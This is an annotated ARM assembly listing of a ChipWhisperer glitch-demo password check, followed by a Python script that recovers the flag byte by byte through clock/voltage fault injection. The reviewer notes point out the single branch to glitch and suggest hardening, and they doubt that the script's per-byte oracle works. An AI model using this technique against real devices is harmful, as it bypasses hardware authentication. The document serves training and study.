zbeubzbeub
@ Review notes on password_GH() (gcc listing with the C source echoed inline;
@ this build is the SS_VER_2_1 variant, returning 0x10 on success, 0x00 otherwise):
@  * The compare is constant-time with respect to the password contents: the loop
@    always runs 15 iterations and ORs every byte mismatch into r3 (`result`),
@    so there is no early exit to time.  That does nothing against fault
@    injection: a single branch, `cbnz r3, .L3` at offset 0x24, decides FLAG1 vs
@    NOPE, and skipping it grants access for any input.  Skipping the loop-back
@    `bne .L2` at 0x22 instead truncates the compare to the bytes seen so far,
@    which is what a byte-by-byte recovery needs.
@  * `len` (r2 under the SS_VER_2_1 signature cmd/scmd/len/pw) is never read:
@    `mov r4, r3` keeps only pw and r2 is immediately reused as the loop pointer.
@    A command shorter than 15 bytes therefore makes the loop read past what the
@    caller supplied (presumably into whatever follows in the simpleserial
@    buffer); the source comment "doesn't check for too-long password!" is only
@    half the story.
@  * In the non-SS_VER_2_1 build `return (cnt != 2500)` reads `cnt`, which is
@    declared (`int cnt;`) but never assigned - undefined behaviour.  Not
@    reachable in this build.
@  * Hardening, were this not the deliberately vulnerable demo target: check
@    `result` twice, compare against a non-zero magic instead of 0, and add a
@    random delay before the decision so one timed glitch cannot flip it.
// password_GH() 1 .cpu cortex-m4 2 .arch armv7e-m 3 .fpu softvfp 4 .eabi_attribute 20, 1 5 .eabi_attribute 21, 1 6 .eabi_attribute 23, 3 7 .eabi_attribute 24, 1 8 .eabi_attribute 25, 1 9 .eabi_attribute 26, 1 10 .eabi_attribute 30, 4 11 .eabi_attribute 34, 1 12 .eabi_attribute 18, 4 13 .file "simpleserial-glitch.c" 14 .text 15 .Ltext0: 16 .cfi_sections .debug_frame 17 .file 1 "simpleserial-glitch.c" 18 .section .text.password_GH,"ax",%progbits 19 .align 1 20 .global password_GH 21 .syntax unified 22 .thumb 23 .thumb_func 25 password_GH: 26 .LVL0: 27 .LFB0: 1:simpleserial-glitch.c **** /* 2:simpleserial-glitch.c **** This file is part of the ChipWhisperer Example Targets 3:simpleserial-glitch.c **** Copyright (C) 2012-2020 NewAE Technology Inc. 4:simpleserial-glitch.c **** 5:simpleserial-glitch.c **** This program is free software: you can redistribute it and/or modify 6:simpleserial-glitch.c **** it under the terms of the GNU General Public License as published by 7:simpleserial-glitch.c **** the Free Software Foundation, either version 3 of the License, or 8:simpleserial-glitch.c **** (at your option) any later version. 9:simpleserial-glitch.c **** 10:simpleserial-glitch.c **** This program is distributed in the hope that it will be useful, 11:simpleserial-glitch.c **** but WITHOUT ANY WARRANTY; without even the implied warranty of 12:simpleserial-glitch.c **** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13:simpleserial-glitch.c **** GNU General Public License for more details. 14:simpleserial-glitch.c **** 15:simpleserial-glitch.c **** You should have received a copy of the GNU General Public License 16:simpleserial-glitch.c **** along with this program. If not, see <http://www.gnu.org/licenses/>. 
17:simpleserial-glitch.c **** */ 18:simpleserial-glitch.c **** 19:simpleserial-glitch.c **** #include "hal.h" 20:simpleserial-glitch.c **** #include <stdint.h> 21:simpleserial-glitch.c **** #include <stdlib.h> 22:simpleserial-glitch.c **** 23:simpleserial-glitch.c **** #include "simpleserial.h" 24:simpleserial-glitch.c **** 25:simpleserial-glitch.c **** //uint8_t infinite_loop(uint8_t* in); 26:simpleserial-glitch.c **** //uint8_t glitch_loop(uint8_t* in); 27:simpleserial-glitch.c **** //uint8_t password(uint8_t* pw); 28:simpleserial-glitch.c **** 29:simpleserial-glitch.c **** // Make sure no optimization happens for demo glitch logic. 30:simpleserial-glitch.c **** // #pragma GCC push_options 31:simpleserial-glitch.c **** // #pragma GCC optimize ("O0") 32:simpleserial-glitch.c **** 33:simpleserial-glitch.c **** uint8_t FLAG1[16] = {'G', 'H', '{', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', 'X', '}', 34:simpleserial-glitch.c **** uint8_t NOPE[16] = {'*', 'a', 'c', 'c', 'e', 's', 's', ' ', 'd', 'e', 'n', 'i', 'e', 'd', '*', 35:simpleserial-glitch.c **** 36:simpleserial-glitch.c **** #if SS_VER == SS_VER_2_1 37:simpleserial-glitch.c **** uint8_t password_GH(uint8_t cmd, uint8_t scmd, uint8_t len, uint8_t* pw) 38:simpleserial-glitch.c **** #else 39:simpleserial-glitch.c **** uint8_t password_GH(uint8_t* pw, uint8_t len) 40:simpleserial-glitch.c **** #endif 41:simpleserial-glitch.c **** { 28 .loc 1 41 5 view -0 29 .cfi_startproc 30 @ args = 0, pretend = 0, frame = 0 31 @ frame_needed = 0, uses_anonymous_args = 0 42:simpleserial-glitch.c **** const static char passwd[] = "GH{XXXXXXXXXXX}"; 32 .loc 1 42 9 view .LVU1 43:simpleserial-glitch.c **** uint8_t result = 0; 33 .loc 1 43 9 view .LVU2 44:simpleserial-glitch.c **** int cnt; 34 .loc 1 44 9 view .LVU3 45:simpleserial-glitch.c **** 46:simpleserial-glitch.c **** trigger_high(); 35 .loc 1 46 9 view .LVU4 41:simpleserial-glitch.c **** const static char passwd[] = "GH{XXXXXXXXXXX}"; 36 .loc 1 41 5 is_stmt 0 view .LVU5 
37 0000 38B5 push {r3, r4, r5, lr} 38 .LCFI0: 39 .cfi_def_cfa_offset 16 40 .cfi_offset 3, -16 41 .cfi_offset 4, -12 42 .cfi_offset 5, -8 43 .cfi_offset 14, -4 41:simpleserial-glitch.c **** const static char passwd[] = "GH{XXXXXXXXXXX}"; 44 .loc 1 41 5 view .LVU6 45 0002 1C46 mov r4, r3 @ r4 = pw; len (r2) is never read
46 .loc 1 46 9 view .LVU7 47 0004 FFF7FEFF bl trigger_high 48 .LVL1: 47:simpleserial-glitch.c **** 48:simpleserial-glitch.c **** //Simple test - doesn't check for too-long password! 49:simpleserial-glitch.c **** for(uint8_t i=0; i < 15; i++) { 49 .loc 1 49 9 is_stmt 1 view .LVU8 50 .LBB2: 51 .loc 1 49 13 view .LVU9 52 .loc 1 49 28 discriminator 1 view .LVU10 53 0008 1048 ldr r0, .L6 54 000a 621E subs r2, r4, #1 55 .LBE2: 43:simpleserial-glitch.c **** int cnt; 56 .loc 1 43 17 is_stmt 0 view .LVU11 57 000c 0023 movs r3, #0 58 000e 0E34 adds r4, r4, #14 59 .LVL2: 60 .L2: 61 .LBB3: 50:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 62 .loc 1 50 25 is_stmt 1 view .LVU12 63 .loc 1 50 32 is_stmt 0 view .LVU13 64 0010 12F8015F ldrb r5, [r2, #1]! 
@ zero_extendqisi2 65 .LVL3: 66 .loc 1 50 49 view .LVU14 67 0014 10F8011B ldrb r1, [r0], #1 @ zero_extendqisi2 49:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 68 .loc 1 49 28 discriminator 1 view .LVU15 69 0018 A242 cmp r2, r4 70 .loc 1 50 32 view .LVU16 71 001a 81EA0501 eor r1, r1, r5 72 001e 43EA0103 orr r3, r3, r1 73 .LVL4: 49:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 74 .loc 1 49 35 is_stmt 1 discriminator 3 view .LVU17 49:simpleserial-glitch.c **** result |= pw[i] ^ passwd[i]; 75 .loc 1 49 28 discriminator 1 view .LVU18 76 0022 F5D1 bne .L2 @ loop-back; a fault that skips it ends the compare after the bytes seen so far
77 .LBE3: 51:simpleserial-glitch.c **** } 52:simpleserial-glitch.c **** if (result == 0) { 78 .loc 1 52 9 view .LVU19 79 .loc 1 52 12 is_stmt 0 view .LVU20 80 0024 43B9 cbnz r3, .L3 @ the one decision point: FLAG1 if r3 (result) is still 0, NOPE otherwise - the glitch target
53:simpleserial-glitch.c **** simpleserial_put('r', 15, FLAG1); 81 .loc 1 53 25 is_stmt 1 view .LVU21 82 0026 7220 movs r0, #114 83 0028 094A ldr r2, .L6+4 84 .LVL5: 85 .loc 1 53 25 is_stmt 0 view .LVU22 86 002a 0F21 movs r1, #15 87 002c FFF7FEFF bl simpleserial_put 88 .LVL6: 54:simpleserial-glitch.c **** } else { 55:simpleserial-glitch.c **** simpleserial_put('r', 15, NOPE); 56:simpleserial-glitch.c **** } 57:simpleserial-glitch.c **** 58:simpleserial-glitch.c **** trigger_low(); 89 .loc 1 58 9 is_stmt 1 view .LVU23 90 0030 FFF7FEFF bl trigger_low 91 .LVL7: 59:simpleserial-glitch.c **** 60:simpleserial-glitch.c **** 61:simpleserial-glitch.c **** #if SS_VER == SS_VER_2_1 62:simpleserial-glitch.c **** return (result == 0) ? 
0x10 : 0x00; 92 .loc 1 62 5 view .LVU24 93 .loc 1 62 33 is_stmt 0 discriminator 1 view .LVU25 94 0034 1020 movs r0, #16 95 .L4: 63:simpleserial-glitch.c **** #else 64:simpleserial-glitch.c **** return (cnt != 2500); 65:simpleserial-glitch.c **** #endif 66:simpleserial-glitch.c **** } 96 .loc 1 66 5 view .LVU26 97 0036 38BD pop {r3, r4, r5, pc} 98 .LVL8: 99 .L3: 55:simpleserial-glitch.c **** } 100 .loc 1 55 25 is_stmt 1 view .LVU27 101 0038 7220 movs r0, #114 102 003a 064A ldr r2, .L6+8 103 .LVL9: 55:simpleserial-glitch.c **** } 104 .loc 1 55 25 is_stmt 0 view .LVU28 105 003c 0F21 movs r1, #15 106 003e FFF7FEFF bl simpleserial_put 107 .LVL10: 58:simpleserial-glitch.c **** 108 .loc 1 58 9 is_stmt 1 view .LVU29 109 0042 FFF7FEFF bl trigger_low 110 .LVL11: 62:simpleserial-glitch.c **** #else 111 .loc 1 62 5 view .LVU30 62:simpleserial-glitch.c **** #else 112 .loc 1 62 33 is_stmt 0 discriminator 2 view .LVU31 113 0046 0020 movs r0, #0 114 0048 F5E7 b .L4 115 .L7: 116 004a 00BF .align 2 117 .L6: 118 004c 00000000 .word .LANCHOR0 119 0050 00000000 .word .LANCHOR1 120 0054 10000000 .word .LANCHOR1+16 121 .cfi_endproc // void trigger_high() & void trigger_low() : 355 .section .text.trigger_high,"ax",%progbits 356 .align 1 357 .global trigger_high 358 .syntax unified 359 .thumb 360 .thumb_func 362 trigger_high: 363 .LFB129: 106:.././hal//stm32f3/stm32f3_hal.c **** 107:.././hal//stm32f3/stm32f3_hal.c **** void trigger_high(void) 108:.././hal//stm32f3/stm32f3_hal.c **** { 364 .loc 1 108 1 is_stmt 1 view -0 365 .cfi_startproc 366 @ args = 0, pretend = 0, frame = 0 367 @ frame_needed = 0, uses_anonymous_args = 0 368 @ link register save eliminated. 
@ Review notes on the trigger helpers and HAL_GPIO_WritePin():
@  * trigger_high()/trigger_low() both tail-call HAL_GPIO_WritePin with
@    r0 = 0x48000000 (1207959552, GPIOA) and r1 = 0x1000 (4096, pin 12), so PA12
@    is the trigger line; password_GH() raises it before the compare loop and
@    lowers it after the reply, which is presumably the edge the glitch script's
@    scope.arm()/capture() synchronise on (ext_offset counted from it - confirm).
@  * HAL_GPIO_WritePin's two assert_param() calls produce no instructions in
@    this build (its first opcode is the cbz on PinState), so the pin/state
@    parameter validation is compiled out.  Harmless here, but worth knowing if
@    this HAL is reused with caller-controlled arguments.
109:.././hal//stm32f3/stm32f3_hal.c **** HAL_GPIO_WritePin(GPIOA, GPIO_PIN_12, SET); 369 .loc 1 109 3 view .LVU109 370 0000 0122 movs r2, #1 371 0002 4FF48051 mov r1, #4096 372 0006 4FF09040 mov r0, #1207959552 373 000a FFF7FEBF b HAL_GPIO_WritePin 374 .LVL10: 375 .cfi_endproc 376 .LFE129: 378 .section .text.trigger_low,"ax",%progbits 379 .align 1 380 .global trigger_low 381 .syntax unified 382 .thumb 383 .thumb_func 385 trigger_low: 386 .LFB130: 110:.././hal//stm32f3/stm32f3_hal.c **** } 111:.././hal//stm32f3/stm32f3_hal.c **** 112:.././hal//stm32f3/stm32f3_hal.c **** void trigger_low(void) 113:.././hal//stm32f3/stm32f3_hal.c **** { 387 .loc 1 113 1 view -0 388 .cfi_startproc 389 @ args = 0, pretend = 0, frame = 0 390 @ frame_needed = 0, uses_anonymous_args = 0 391 @ link register save eliminated. 114:.././hal//stm32f3/stm32f3_hal.c **** HAL_GPIO_WritePin(GPIOA, GPIO_PIN_12, RESET); 392 .loc 1 114 3 view .LVU111 393 0000 0022 movs r2, #0 394 0002 4FF48051 mov r1, #4096 395 0006 4FF09040 mov r0, #1207959552 396 000a FFF7FEBF b HAL_GPIO_WritePin 397 .LVL11: 398 .cfi_endproc // HAL_GPIO_WritePin() 2685 .section .text.HAL_GPIO_WritePin,"ax",%progbits 2686 .align 1 2687 .global HAL_GPIO_WritePin 2688 .syntax unified 2689 .thumb 2690 .thumb_func 2692 HAL_GPIO_WritePin: 2693 .LVL213: 2694 .LFB136: 778:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** 779:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** /** 780:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @brief Set or clear the selected data port bit. 781:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * 782:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @note This function uses GPIOx_BSRR and GPIOx_BRR registers to allow atomic read/modify 783:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * accesses. In this way, there is no risk of an IRQ occurring between 784:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * the read and the modify access. 
785:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * 786:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @param GPIOx: where x can be (A..F) to select the GPIO peripheral for STM32F3 family 787:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @param GPIO_Pin: specifies the port bit to be written. 788:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * This parameter can be one of GPIO_PIN_x where x can be (0..15). 789:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @param PinState: specifies the value to be written to the selected bit. 790:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * This parameter can be one of the GPIO_PinState enum values: 791:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @arg GPIO_PIN_RESET: to clear the port pin 792:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @arg GPIO_PIN_SET: to set the port pin 793:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** * @retval None 794:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** */ 795:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** void HAL_GPIO_WritePin(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin, GPIO_PinState PinState) 796:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** { 2695 .loc 1 796 1 is_stmt 1 view -0 2696 .cfi_startproc 2697 @ args = 0, pretend = 0, frame = 0 2698 @ frame_needed = 0, uses_anonymous_args = 0 2699 @ link register save eliminated. 
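797:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** /* Check the parameters */ 798:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** assert_param(IS_GPIO_PIN(GPIO_Pin)); 2700 .loc 1 798 3 view .LVU880 799:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** assert_param(IS_GPIO_PIN_ACTION(PinState)); 2701 .loc 1 799 3 view .LVU881 800:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** 801:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** if(PinState != GPIO_PIN_RESET) 2702 .loc 1 801 3 view .LVU882 2703 .loc 1 801 5 is_stmt 0 view .LVU883 2704 0000 0AB1 cbz r2, .L185 802:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** { 803:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** GPIOx->BSRR = (uint32_t)GPIO_Pin; 2705 .loc 1 803 5 is_stmt 1 view .LVU884 2706 .loc 1 803 17 is_stmt 0 view .LVU885 2707 0002 8161 str r1, [r0, #24] 2708 0004 7047 bx lr 2709 .L185: 804:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** } 805:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** else 806:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** { 807:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** GPIOx->BRR = (uint32_t)GPIO_Pin; 2710 .loc 1 807 5 is_stmt 1 view .LVU886 2711 .loc 1 807 16 is_stmt 0 view .LVU887 2712 0006 8162 str r1, [r0, #40] 808:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** } 809:.././hal//stm32f3/stm32f3_hal_lowlevel.c **** } 2713 .loc 1 809 1 view .LVU888 2714 0008 7047 bx lr 2715 .cfi_endproc

# Byte-by-byte recovery of the password checked by password_GH() (listing
# above) with ChipWhisperer clock/voltage glitching.  `scope`, `target` and
# `reboot_flush` come from the notebook session that set up the hardware; they
# are not defined in this snippet.

# Glitch spots (width, offset, ext_offset) that already produced faults.
# NOTE(review): ext_offset is fixed per spot, while the compare loop in
# password_GH() is six instructions per byte (ldrb/ldrb/cmp/eor/orr/bne), so a
# glitch aimed at the loop iteration for byte i would need a timing that moves
# with i.  A fixed offset can only target a fixed point such as the final cbnz;
# confirm which instruction these spots hit before trusting a per-byte oracle.
good_spots = [
    (10.15625, -1.171875, 6),
    (10.15625, 0.0, 1),
    (10.15625, 1.171875, 1),
]

# Secret layout, from the compiled source echoed in the listing:
#     const static char passwd[] = "GH{XXXXXXXXXXX}";   -> 15 bytes, indices 0..14
# "GH{" (0..2) and "}" (14) are known, so only 3..13 have to be recovered.
# (The original loop ran range(3, 15) and then appended '}' as well, producing a
# 16-character "flag" with the closing brace twice.)
PW_LEN = 15
KNOWN_PREFIX = "GH{"
KNOWN_SUFFIX = "}"
UNKNOWN_POSITIONS = range(len(KNOWN_PREFIX), PW_LEN - len(KNOWN_SUFFIX))   # 3..13

# Placeholder ('Z') for positions not yet recovered; any byte works as long as
# nothing relies on it being correct.
FILLER = 0x5A

# Number of control attempts used to reject a non-selective glitch (see
# glitch_is_selective).
CONTROL_TRIES = 3

flag = list(KNOWN_PREFIX)


def set_glitch(glitch):
    """Program one (width, offset, ext_offset) triple into the scope."""
    width, offset, ext_offset = glitch
    scope.glitch.width = width
    scope.glitch.offset = offset
    scope.glitch.ext_offset = ext_offset


def test_pw(pw_bytes, glitch):
    """Send one password attempt under `glitch`.

    Returns the target's PW_LEN-byte 'r' response, or None if the capture timed
    out or the reply frame was invalid.  The 'z' command is assumed to be wired
    to password_GH() (the simpleserial command table is not on this page).
    """
    set_glitch(glitch)
    reboot_flush()
    scope.arm()
    target.simpleserial_write('z', bytes(pw_bytes))
    if scope.capture():                 # True == trigger timeout
        return None
    val = target.simpleserial_read_witherrors('r', PW_LEN, timeout=20)
    if val is None or not val["valid"]:
        return None
    return val["payload"]


def is_flag(payload):
    """True when the reply is FLAG1 ("GH{...}") rather than NOPE ("*access denied*").

    Checking the whole known prefix instead of a single byte keeps a corrupted
    NOPE frame from being counted as a hit.
    """
    if payload is None:
        return False
    return bytes(payload[:len(KNOWN_PREFIX)]) == KNOWN_PREFIX.encode()


def candidate(known, pos, val):
    """PW_LEN-byte attempt: `known` bytes first, `val` at `pos`, filler elsewhere."""
    pw = [FILLER] * PW_LEN
    for j, c in enumerate(known):
        pw[j] = ord(c)
    pw[pos] = val
    return pw


def glitch_is_selective(pos, val, glitch):
    """Reject hits produced by a glitch that bypasses the whole check.

    password_GH() ORs every byte mismatch into one register and decides with a
    single cbnz, so a fault that skips that branch returns FLAG1 for *any*
    candidate - a naive search would then "find" 0x20 at every position.
    Re-run the same spot with a byte that is certainly wrong at `pos`
    (val ^ 1); if that ever yields the flag, the spot is not a per-byte oracle.
    Glitching is probabilistic, so this is a heuristic, not a proof.
    """
    control = candidate(flag, pos, val ^ 0x01)
    return not any(is_flag(test_pw(control, glitch)) for _ in range(CONTROL_TRIES))


for i in UNKNOWN_POSITIONS:
    print(f"\n[*] Glitching byte {i}...")
    found = None
    for glitch in good_spots:
        # Brute-force printable ASCII at position i under this spot.
        for val in range(0x20, 0x7F):
            if not is_flag(test_pw(candidate(flag, i, val), glitch)):
                continue
            if glitch_is_selective(i, val, glitch):
                found = val
            else:
                print(f"[-] Spot {glitch} also accepts a wrong byte at {i}; "
                      "not selective, trying the next spot")
            break                       # either way, stop scanning this spot
        if found is not None:
            break
    if found is None:
        # Abort instead of silently continuing: every later byte would be
        # written one position too early.
        raise SystemExit(f"[!] Byte {i} not recovered; flag so far: {''.join(flag)}")
    print(f"[+] Found byte {i}: {chr(found)}")
    flag.append(chr(found))

flag.append(KNOWN_SUFFIX)
print("\n==== FLAG RECOVERED ====")
print("FLAG =", "".join(flag))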